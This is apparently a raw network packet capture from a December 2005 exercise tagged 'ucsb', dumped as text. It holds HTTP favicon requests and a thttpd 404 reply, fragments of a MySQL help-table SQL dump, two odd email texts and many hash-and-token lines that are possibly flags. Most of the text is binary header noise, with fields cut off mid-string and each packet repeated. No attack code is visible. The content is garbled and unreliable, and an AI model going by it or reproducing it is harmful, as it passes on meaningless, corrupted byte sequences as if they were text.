76ABB7BFFC3E26906889BC4AE728E297,ucsb,MTNzEwEDAQGk8xL5LbXCy ZZʪBiEL@/o0o0oE4X@@J Y P+lm*G G57=xCy BiBaE@/o0 o0E~X@) Y P+lm*G( G57=xGET /favicon.ico HTTP/1.1 Host: 10.0.0.10 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050920 Firefox/1.0.7 Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.7,de;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cy ʪBiE@/̀o0o0oE~X@@ Y P+lm*G( G57=xGET /favicon.ico HTTP/1.1 Host: 10.0.0.10 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050920 Firefox/1.0.7 Accept: image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.7,de;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cz bbBi0`ET@/p܂Ao0E<@?x  3Ptj C )@to a table that has no FULLTEXT\nindex, then create the index with ALTER TABLE (or\nCREATE INDEX). Loading data into a table that has an existing\nFULLTEXT index could be significantly slower.\n','mysql> SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [ESCAPE \'escape-char\']).\n','Cz bbBi0`ET@/ԂSŀo0E<*@?  Pԙ: 6 '<dKW2AHiAAscxdpi/jMGw==
46EB41B83010F956C481F2B0B37B9802,ucsb,MTNzEwEDAQKgxw/sQ1Dopm3IbSEyg+9RwyNlKg==
538478A88C5174A1F0BA887540DC5CEF,ucsb,MTNzEwEDAQPaNonCGTrKCMUMC29kShp9vdz5GQ==
5BA9A6CC48A48D1B2A7E1D2A3122818A,ucsb,MTNzEwEDAQQSBhg/sNAUX9y31eHBPe4b8g7vOg==
AEAE5132108D29AA2DFE17523E044E51,ucsb,MTNzEwEDAQWls46Lgf0kjdA6f26S0tuM/qCNvg==
72EF5FF530A0C8B462833B085DB8E150,ucsb,MTNzEwEDAQYYlD+Hx9OsagPfRAVn7xcoGXlv/Q==
C47CCB311E8942B64430F80CEFC1C747,ucsb,MTNzEwEDAQdvqOBQpSMafyQk3X5RSGynMxuqqQ==
132BB00F7645FD6F4E991C941B1D9FC0,ucsb,MTNzEwEDAQiILz6QssexsjHSt/8wqlvSlxShAA==
8AC37CB79E8AD8CBF38C28547F96D409,ucsb,MTNzEwEDAQkTuo5Zo6+6eU7daaDDT5+0FGTPsw==
2B fa0 135D18A7F649A5905FEC5E837F262A,ucsb,MTNzEwEDAQp6ne7A8LDNfgmif+lwdsWxuIoRiQ==
4A39E9F9AD00AD20E3B8401024E2C33E,ucsb,MTNzEwEDAQvZKaeYWK1OKVemaPfWcSG7fosN8w==
B0FD1167BBB51B72924CD371F4C7A6FB,ucsb,MTNzEwEDAQzYgR9UQURIqDIwuJL+w5EyQG/C7Q==
81C4F33314EED9AF55A8D8169B34F50E,ucsb,MTNzEwEDAQ0LKkJU3x317I8JKeqDCzIPJVJKiQ==
2EF98E3B61FBFCC4B5297A27C6D18AFE,ucsb,MTNzEwEDAQ4EJ9OXqqdWUH3EeZedShI3GDmxPQ==
3D9B47AAEF08F62C48DEAC348916BDD9,ucsb,MTNzEwEDAQ/pNva6z2YFAtOPy/UF7IN1Pr41QA==
AE30CA1A47D4EB71056391ED59E50F82,ucsb,MTNzEwEDARBamZcw1qRIyq+4RnOi8+IvU1l7sw==
704803923BCz ZZBi0`EL@/܂Sŀo0E4@? 3 Pb컳)f )QCz bb0`BiET@/Ԁo0SE<@@w  3Ptj C )@to a table that has no FULLTEXT\nindex, then create the index with ALTER TABLE (or\nCREATE INDEX). Loading data into a table that has an existing\nFULLTEXT index could be significantly slower.\n','mysql> SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [ESCAPE \'escape-char\']).\n','Cz bb0`BiET@/o0AE<*@@  Pԙ: 6 '<dKW2AHiAAscxdpi/jMGw==
46EB41B83010F956C481F2B0B37B9802,ucsb,MTNzEwEDAQKgxw/sQ1Dopm3IbSEyg+9RwyNlKg==
538478A88C5174A1F0BA887540DC5CEF,ucsb,MTNzEwEDAQPaNonCGTrKCMUMC29kShp9vdz5GQ==
5BA9A6CC48A48D1B2A7E1D2A3122818A,ucsb,MTNzEwEDAQQSBhg/sNAUX9y31eHBPe4b8g7vOg==
AEAE5132108D29AA2DFE17523E044E51,ucsb,MTNzEwEDAQWls46Lgf0kjdA6f26S0tuM/qCNvg==
72EF5FF530A0C8B462833B085DB8E150,ucsb,MTNzEwEDAQYYlD+Hx9OsagPfRAVn7xcoGXlv/Q==
C47CCB311E8942B64430F80CEFC1C747,ucsb,MTNzEwEDAQdvqOBQpSMafyQk3X5RSGynMxuqqQ==
132BB00F7645FD6F4E991C941B1D9FC0,ucsb,MTNzEwEDAQiILz6QssexsjHSt/8wqlvSlxShAA==
8AC37CB79E8AD8CBF38C28547F96D409,ucsb,MTNzEwEDAQkTuo5Zo6+6eU7daaDDT5+0FGTPsw==
2B fa0 135D18A7F649A5905FEC5E837F262A,ucsb,MTNzEwEDAQp6ne7A8LDNfgmif+lwdsWxuIoRiQ==
4A39E9F9AD00AD20E3B8401024E2C33E,ucsb,MTNzEwEDAQvZKaeYWK1OKVemaPfWcSG7fosN8w==
B0FD1167BBB51B72924CD371F4C7A6FB,ucsb,MTNzEwEDAQzYgR9UQURIqDIwuJL+w5EyQG/C7Q==
81C4F33314EED9AF55A8D8169B34F50E,ucsb,MTNzEwEDAQ0LKkJU3x317I8JKeqDCzIPJVJKiQ==
2EF98E3B61FBFCC4B5297A27C6D18AFE,ucsb,MTNzEwEDAQ4EJ9OXqqdWUH3EeZedShI3GDmxPQ==
3D9B47AAEF08F62C48DEAC348916BDD9,ucsb,MTNzEwEDAQ/pNva6z2YFAtOPy/UF7IN1Pr41QA==
AE30CA1A47D4EB71056391ED59E50F82,ucsb,MTNzEwEDARBamZcw1qRIyq+4RnOi8+IvU1l7sw==
704803923BCz ZZ0`BiEL@/go0AE4@@ 3 Pb컳)f )QC{ bbBi0`ET@/أ  o0E<@?j  3PZi?& ߰ _)rough time I need your help! I need to be able to: Travel back in time. Rewind my life including my age back to 4. Be able to remember what I know now. I am in very great danger and need this immediately! I am aware that there are many types of time travel, and that humans do not do well through certain types. If you can help me I will pay for your teleport or trip down here, Along with hotel stay, food and all expenses. I will pay top dollar for the equipment. Proof must be provided. Only if you have this technology and can help me please send me a (SEPARATE) email to: xxxxxx@aol.com Please do not reply if your an evil alien! Thanks',96),(3,'Surgblumm@aol.com','Dear Internet User: To start let me say this, I\'m tired of the porn email in my email box and all that click here crap. I\'m a published author in the United States, Germany and Japan. I\'ve spend seven hours or more a day for the last two months researching the topic of Spam on the Internet. I\'ve learned a lot about SMTP blocking, reporting Spam, and blocking your email account from being spammed. In this time I have practiced everything I have learned in blocking this crap mail they call professional advertising and in the last few weeks I have not yet received one piece of Spam. I wrote a full repC#{ ZZBi0`EL@/"  o0E4WN@?Z  ~P*I4y F7=wC;{ bb0`BiET@/Ԁo0SE<@@i  3PZi?& ߰ _)rough time I need your help! I need to be able to: Travel back in time. Rewind my life including my age back to 4. Be able to remember what I know now. I am in very great danger and need this immediately! I am aware that there are many types of time travel, and that humans do not do well through certain types. If you can help me I will pay for your teleport or trip down here, Along with hotel stay, food and all expenses. I will pay top dollar for the equipment. Proof must be provided. Only if you have this technology and can help me please send me a (SEPARATE) email to: xxxxxx@aol.com Please do not reply if your an evil alien! Thanks',96),(3,'Surgblumm@aol.com','Dear Internet User: To start let me say this, I\'m tired of the porn email in my email box and all that click here crap. I\'m a published author in the United States, Germany and Japan. I\'ve spend seven hours or more a day for the last two months researching the topic of Spam on the Internet. I\'ve learned a lot about SMTP blocking, reporting Spam, and blocking your email account from being spammed. In this time I have practiced everything I have learned in blocking this crap mail they call professional advertising and in the last few weeks I have not yet received one piece of Spam. I wrote a full repCN{ ZZʪBiEL@/o0o0oE4WN@@Z  ~P*I4y F7=wC| ZZBi0`EL@/"  o0E4WP@?X  ~P*I4j  F7=wC%| ZZʪBiEL@/o0o0oE4WP@@X  ~P*I4j  F7=wC| ZZBiʪEL@/o0oo0E4@@3 YP*G+ln_v 7=xG5C| ZZBaBiEL@/fo0o0 E4@@3 YP*G+ln_v 7=xG5C~~ bbBi0`ET@/p܂Ao0E SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP'C~ BiʪE@/Ҁo0oo0Ey@@1B YP*G+ln_)b 7=xG5HTTP/1.1 404 Not Found Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Fri, 09 Dec 2005 19:44:15 GMT Last-Modified: Fri, 09 Dec 2005 19:44:15 GMT Accept-Ranges: bytes Connection: close Cache-Control: no-cache,no-store 404 Not Found

404 Not Found

The requested URL '/favicon.ico' was not found on this server.
thttpd/2.25b 29dec2003
C~ ZZBiʪEL@/o0oo0E4@@3 YP*+ln_0 7=xG5C~ ZZBiʪEL@/o0oo0E4@@i P~4j*J  7=xFC~ bb0`BiET@/Ԁo0SE SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0',''),(222,'NOW',14,' NOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT NOW();\n -> \'1997-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP'C~ BaBiE@/!o0o0 Ey@@1B YP*G+ln_)b 7=xG5HTTP/1.1 404 Not Found Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Fri, 09 Dec 2005 19:44:15 GMT Last-Modified: Fri, 09 Dec 2005 19:44:15 GMT Accept-Ranges: bytes Connection: close Cache-Control: no-cache,no-store 404 Not Found

404 Not Found

The requested URL '/favicon.ico' was not found on this server.
thttpd/2.25b 29dec2003
C~ ZZBaBiEL@/fo0o0 E4@@3 YP*+ln_0 7=xG5C~ ZZ0`BiEL@/o0  E4@@i P~4j*J  7=xFCk ZZBiBaEL@/fo0 o0E4X@)F Y P+ln_*׎ G57=xC ZZʪBiEL@/o0o0oE4X@@F Y P+ln_*׎ G57=xC bbBi0`ET@/p܂Ao0E SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2)C bb0`BiET@/Ԁo0SE SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2)C` bbBi0`ET@/ԂSŀo0E<+@?  Pԙ : 1/ '<d739D44DB035109F624B24E,ucsb,MTNzEwEDARH+RNjtvREuZFEdYTQm183MBXByPw==
75E97F0F49E49B264FD728706E0E4671,ucsb,MTNzEwEDARKu3Qem7mMNOhn6qT5w5N3Fef4f8A==
E0648FF2DEF744331EA5558263F7D103,ucsb,MTNzEwEDARNl4vtAP5ri3NYet0BYclxI0x5lRA==
130DA4A35764EE3B89D6485D78BF7D2F,ucsb,MTNzEwEDARRrg9ghvB3Gs0872y6uHsL5jZxT7A==
6F418D4363A35230F0812247169ED068,ucsb,MTNzEwEDARWOte87fchwCoQaww5hI12BFNCqTg==
C097D0F084D39D0D526E0D7A3C47B1ED,ucsb,MTNzEwEDARbaIMs+CRA2Qf28wGwb0k/jahgWrA==
020F348E98B28E4DBBD564AB9D6DB398,ucsb,MTNzEwEDARdzApVtThE+3p67ctVn2GvrL9tgvg==
8D88015FC927F51AB6AC0D53B4B8E39C,ucsb,MTNzEwEDARgLP6mmRyYfI5ndjCQsoNt0VCjspg==
EA1C2262AB59569CE3FFBBA230164987,ucsb,MTNzEwEDARlWmgw658LegxRZogFmGNOuTtO8mQ==
79FFD4A97D77275E102C180053DFDAD0,ucsb,MTNzEwEDARoA0TQdfg202G4HPrCoiEdVuUWiDQ==
142A844F68A9CF2786D27ADA9C722B16,ucsb,MTNzEwEDARtLjQw2BZulRicOcdpLxkgfjSfXzg==
14D900AC657FA7808E4FEB9A332934E4,ucsb,MTNzEwEDARx/Iyxu4d9AHVUbmhLGlwgAuje8lg==
390FFA094055385DF0615EC7D9DE1C56,ucsb,MTNzEwEDAR1J9CGx2JD0bCHnV8oWRDr6957AlQ==
A5FEB6090B428C276DFF6F2A43A69240,ucsb,MTNzEwEDAR6X5dWpPKFDxwkPVao2USUpYMrPZw==
079DE2A350259199634F1C2AF480E659,ucsb,MTNzEwEDAR+7CZ5X/z3QYAdFLJ6nvlfSnqQiow==
D4640F0B7BE600C5FC3817DCC5F80441,ucsb,MTNzEwEDASDa6bFCi ZZBi0`EL@/܂Sŀo0E4@? 3 Pb컽)\ )RC bb0`BiET@/o0AE<+@@  Pԙ : 1/ '<d739D44DB035109F624B24E,ucsb,MTNzEwEDARH+RNjtvREuZFEdYTQm183MBXByPw==
75E97F0F49E49B264FD728706E0E4671,ucsb,MTNzEwEDARKu3Qem7mMNOhn6qT5w5N3Fef4f8A==
E0648FF2DEF744331EA5558263F7D103,ucsb,MTNzEwEDARNl4vtAP5ri3NYet0BYclxI0x5lRA==
130DA4A35764EE3B89D6485D78BF7D2F,ucsb,MTNzEwEDARRrg9ghvB3Gs0872y6uHsL5jZxT7A==
6F418D4363A35230F0812247169ED068,ucsb,MTNzEwEDARWOte87fchwCoQaww5hI12BFNCqTg==
C097D0F084D39D0D526E0D7A3C47B1ED,ucsb,MTNzEwEDARbaIMs+CRA2Qf28wGwb0k/jahgWrA==
020F348E98B28E4DBBD564AB9D6DB398,ucsb,MTNzEwEDARdzApVtThE+3p67ctVn2GvrL9tgvg==
8D88015FC927F51AB6AC0D53B4B8E39C,ucsb,MTNzEwEDARgLP6mmRyYfI5ndjCQsoNt0VCjspg==
EA1C2262AB59569CE3FFBBA230164987,ucsb,MTNzEwEDARlWmgw658LegxRZogFmGNOuTtO8mQ==
79FFD4A97D77275E102C180053DFDAD0,ucsb,MTNzEwEDARoA0TQdfg202G4HPrCoiEdVuUWiDQ==
142A844F68A9CF2786D27ADA9C722B16,ucsb,MTNzEwEDARtLjQw2BZulRicOcdpLxkgfjSfXzg==
14D900AC657FA7808E4FEB9A332934E4,ucsb,MTNzEwEDARx/Iyxu4d9AHVUbmhLGlwgAuje8lg==
390FFA094055385DF0615EC7D9DE1C56,ucsb,MTNzEwEDAR1J9CGx2JD0bCHnV8oWRDr6957AlQ==
A5FEB6090B428C276DFF6F2A43A69240,ucsb,MTNzEwEDAR6X5dWpPKFDxwkPVao2USUpYMrPZw==
079DE2A350259199634F1C2AF480E659,ucsb,MTNzEwEDAR+7CZ5X/z3QYAdFLJ6nvlfSnqQiow==
D4640F0B7BE600C5FC3817DCC5F80441,ucsb,MTNzEwEDASDa6bFC ZZ0`BiEL@/go0AE4@@ 3 Pb컽)\ )RC݃ bbBi0`ET@/ԂSŀo0E<,@?  Pԙ:  '<d1GXmFZFfM6QYWhvTISuPtgQ==
E2D97125DBA29263DA67DBE88AF762B5,ucsb,MTNzEwEDASHeExuuumCXywSWE7cB6Xyg9uWDUA==
6B2B0931418B03E80496ED23BB773F93,ucsb,MTNzEwEDASJNEHO2paOuh5seCbOWLAbZyid1Hw==
94328C6A898CB8F1599D403F66F086BC,ucsb,MTNzEwEDASM6+So2vlaHFSltccLMYAi9cfXheQ==
DA4920F17400BDA4312336C7CF098DC5,ucsb,MTNzEwEDASQbvon2nDQiHFawX9nvKdYsxrKsoA==
D77B29CFFA84680B12748BA8551B78E7,ucsb,MTNzEwEDASVpdEP6t6QoMR1FE7c30+rTRGjwNA==
49688775DF55EAE952E9E925AC7BF1DA,ucsb,MTNzEwEDASYWj4ElcyYRc4Hlp+5NkkuHZjPo8Q==
F3F41C6B6E62D03FD3AC1482387333BC,ucsb,MTNzEwEDASf8OMa+o8QhieCbcM3tVcq/8Q374g==
D72B61C76884D87CB2E19DB5D81C644E,ucsb,MTNzEwEDASio57Eb/OBC7/yDGZxFREai7/dDbg==
DEE234D6E21F2D4A213604D1E5F16686,ucsb,MTNzEwEDASnSKP8jxvji4wzEtC6DMv3T7smc4w==
BAAEAA1AD1A03D19639545CC53354196,ucsb,MTNzEwEDASoIBLM+WOiYS3gcIZ+kVcM6YpDTXw==
8F1E4BD1922B4E720C604E199E5E3264,ucsb,MTNzEwEDASvDHTe80bLEr8RRNaX6Q0JIEXQfrA==
8D982A054245A03FA5F341EE5FF70663,ucsb,MTNzEwEDASzj1Q+0nazY7uGNqHvFfAIVID05/w==
DCCBB91FB1666E194961A221A42719C6,ucsb,MTNzEwEDAS33H3420qkwSWxJ7n9r5jKIRYNjUg==
B67091213DE3E1E4FBB4DE07705CEB07,ucsb,MTNzEwEDAS76Wl7l/9yQCHcYInX8XhyZ23ZJ/Q==
500BA8C7BCB6D1CBDCDB585108DBB76A,ucsb,MTNzEwEDAS+m92Rns1HXwLnYEtVJHeRjLZt6VQ==
70FA74143BDFDC bb0`BiET@/o0AE<,@@  Pԙ:  '<d1GXmFZFfM6QYWhvTISuPtgQ==
E2D97125DBA29263DA67DBE88AF762B5,ucsb,MTNzEwEDASHeExuuumCXywSWE7cB6Xyg9uWDUA==
6B2B0931418B03E80496ED23BB773F93,ucsb,MTNzEwEDASJNEHO2paOuh5seCbOWLAbZyid1Hw==
94328C6A898CB8F1599D403F66F086BC,ucsb,MTNzEwEDASM6+So2vlaHFSltccLMYAi9cfXheQ==
DA4920F17400BDA4312336C7CF098DC5,ucsb,MTNzEwEDASQbvon2nDQiHFawX9nvKdYsxrKsoA==
D77B29CFFA84680B12748BA8551B78E7,ucsb,MTNzEwEDASVpdEP6t6QoMR1FE7c30+rTRGjwNA==
49688775DF55EAE952E9E925AC7BF1DA,ucsb,MTNzEwEDASYWj4ElcyYRc4Hlp+5NkkuHZjPo8Q==
F3F41C6B6E62D03FD3AC1482387333BC,ucsb,MTNzEwEDASf8OMa+o8QhieCbcM3tVcq/8Q374g==
D72B61C76884D87CB2E19DB5D81C644E,ucsb,MTNzEwEDASio57Eb/OBC7/yDGZxFREai7/dDbg==
DEE234D6E21F2D4A213604D1E5F16686,ucsb,MTNzEwEDASnSKP8jxvji4wzEtC6DMv3T7smc4w==
BAAEAA1AD1A03D19639545CC53354196,ucsb,MTNzEwEDASoIBLM+WOiYS3gcIZ+kVcM6YpDTXw==
8F1E4BD1922B4E720C604E199E5E3264,ucsb,MTNzEwEDASvDHTe80bLEr8RRNaX6Q0JIEXQfrA==
8D982A054245A03FA5F341EE5FF70663,ucsb,MTNzEwEDASzj1Q+0nazY7uGNqHvFfAIVID05/w==
DCCBB91FB1666E194961A221A42719C6,ucsb,MTNzEwEDAS33H3420qkwSWxJ7n9r5jKIRYNjUg==
B67091213DE3E1E4FBB4DE07705CEB07,ucsb,MTNzEwEDAS76Wl7l/9yQCHcYInX8XhyZ23ZJ/Q==
500BA8C7BCB6D1CBDCDB585108DBB76A,ucsb,MTNzEwEDAS+m92Rns1HXwLnYEtVJHeRjLZt6VQ==
70FA74143BDFDCZ bbBi0`ET@/ԂSŀo0E<-@?  Pԙ: ؕ '<d18D27DFABCE87621420,ucsb,MTNzEwEDATBMLLmVALSAN4mByZ36jm7yAl+UuA==
BB628855C52D61B7B6FA0B78F019E301,ucsb,MTNzEwEDATGvC35U0tSsq1jSUXrBvuFEhmhiuw==
75F15B21E066E9A59FDC2056C018072D,ucsb,MTNzEwEDATJ1Wz7+WBO/CsnV+AORFUq9Iw7fSg==
2E7AA44E53E223CB16A8DB13F4FA01BD,ucsb,MTNzEwEDATMSXtqrbF/WiryQPqlUKfcYqQdz+A==
40158A266FD342FF3E1C77773E434701,ucsb,MTNzEwEDATSy5HcHvifln4FigNQt35cACZLVKQ==
15F15F13445100ECD057F14B4467C143,ucsb,MTNzEwEDATVj8Bevmhb0H9J3xim/dOUFasNUdg==
8E1D0BCEA8B56FB9DA9BD154BAC2F217,ucsb,MTNzEwEDATaX1EOce5SMLoJfjj0Rh673wUVJ2g==
9EDE903C7CC466A246ADE602678BC6BB,ucsb,MTNzEwEDATeVBKMXWR99JRpt2DvIn728gIOz7g==
A53A11FDF0B582C6E744732A56A26949,ucsb,MTNzEwEDATjVs+6GVzPUoOEBf4EtWwn8RFIlMw==
E541EDC295D07A6423909F5391C3DAB1,ucsb,MTNzEwEDATlhM15oz/iq5HWZOhJUvUKtkpw0Nw==
8EC8FCA14E37CE86B8 fa0 E6CC95E39EA5DD,ucsb,MTNzEwEDATq5BwCvPSIBO+xHcq1fOzkRCwMDng==
AD1DA00D243A480A8A2E61990645BB5F,ucsb,MTNzEwEDATuF0vI5S/5lyTDF1URnYw2gmi3WJw==
AB513BD0AC4CF6A6A8D9228696847E4C,ucsb,MTNzEwEDATxHfLl+xD5kAQ2ib5lQ8R2BasKFfA==
9FDD92909777AB720422FDB8B7839864,ucsb,MTNzEwEDAT0jfV8nfCcaLEaxLN8CfPQSB179rg==
DD42DF9AAA8177038868B158EBBC8514,ucsb,MTNzEwEDAT4gioUM9V0VacH4idkpDmZTRSNLEw==
32AD6223E9CB47A4BD4BBC59B6B66FA7,ucsb,MTNzEwEDAT8Ct bb0`BiET@/o0AE<-@@  Pԙ: ؕ '<d18D27DFABCE87621420,ucsb,MTNzEwEDATBMLLmVALSAN4mByZ36jm7yAl+UuA==
BB628855C52D61B7B6FA0B78F019E301,ucsb,MTNzEwEDATGvC35U0tSsq1jSUXrBvuFEhmhiuw==
75F15B21E066E9A59FDC2056C018072D,ucsb,MTNzEwEDATJ1Wz7+WBO/CsnV+AORFUq9Iw7fSg==
2E7AA44E53E223CB16A8DB13F4FA01BD,ucsb,MTNzEwEDATMSXtqrbF/WiryQPqlUKfcYqQdz+A==
40158A266FD342FF3E1C77773E434701,ucsb,MTNzEwEDATSy5HcHvifln4FigNQt35cACZLVKQ==
15F15F13445100ECD057F14B4467C143,ucsb,MTNzEwEDATVj8Bevmhb0H9J3xim/dOUFasNUdg==
8E1D0BCEA8B56FB9DA9BD154BAC2F217,ucsb,MTNzEwEDATaX1EOce5SMLoJfjj0Rh673wUVJ2g==
9EDE903C7CC466A246ADE602678BC6BB,ucsb,MTNzEwEDATeVBKMXWR99JRpt2DvIn728gIOz7g==
A53A11FDF0B582C6E744732A56A26949,ucsb,MTNzEwEDATjVs+6GVzPUoOEBf4EtWwn8RFIlMw==
E541EDC295D07A6423909F5391C3DAB1,ucsb,MTNzEwEDATlhM15oz/iq5HWZOhJUvUKtkpw0Nw==
8EC8FCA14E37CE86B8 fa0 E6CC95E39EA5DD,ucsb,MTNzEwEDATq5BwCvPSIBO+xHcq1fOzkRCwMDng==
AD1DA00D243A480A8A2E61990645BB5F,ucsb,MTNzEwEDATuF0vI5S/5lyTDF1URnYw2gmi3WJw==
AB513BD0AC4CF6A6A8D9228696847E4C,ucsb,MTNzEwEDATxHfLl+xD5kAQ2ib5lQ8R2BasKFfA==
9FDD92909777AB720422FDB8B7839864,ucsb,MTNzEwEDAT0jfV8nfCcaLEaxLN8CfPQSB179rg==
DD42DF9AAA8177038868B158EBBC8514,ucsb,MTNzEwEDAT4gioUM9V0VacH4idkpDmZTRSNLEw==
32AD6223E9CB47A4BD4BBC59B6B66FA7,ucsb,MTNzEwEDAT8Cx ZZBi0`EL@/܂Sŀo0E4@? 3 Pb€)R )RC ZZ0`BiEL@/go0AE4@@ 3 Pb€)R )RCЅ ZZBiBaEL@/fo0 o0E4X@)D Y P+ln_*׎ G57=xC ZZʪBiEL@/o0o0oE4X@@D Y P+ln_*׎ G57=xCÇ bbBi0`ET@/p܂Ao0E SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nC͇ ZZBiʪEL@/o0oo0E4@@3 YP*+ln`* 7=xG5C bb0`BiET@/Ԁo0SE SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nC ZZBaBiEL@/fo0o0 E4@@3 YP*+ln`* 7=xG5C( bbBi0`ET@/p܂Ao0E SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' 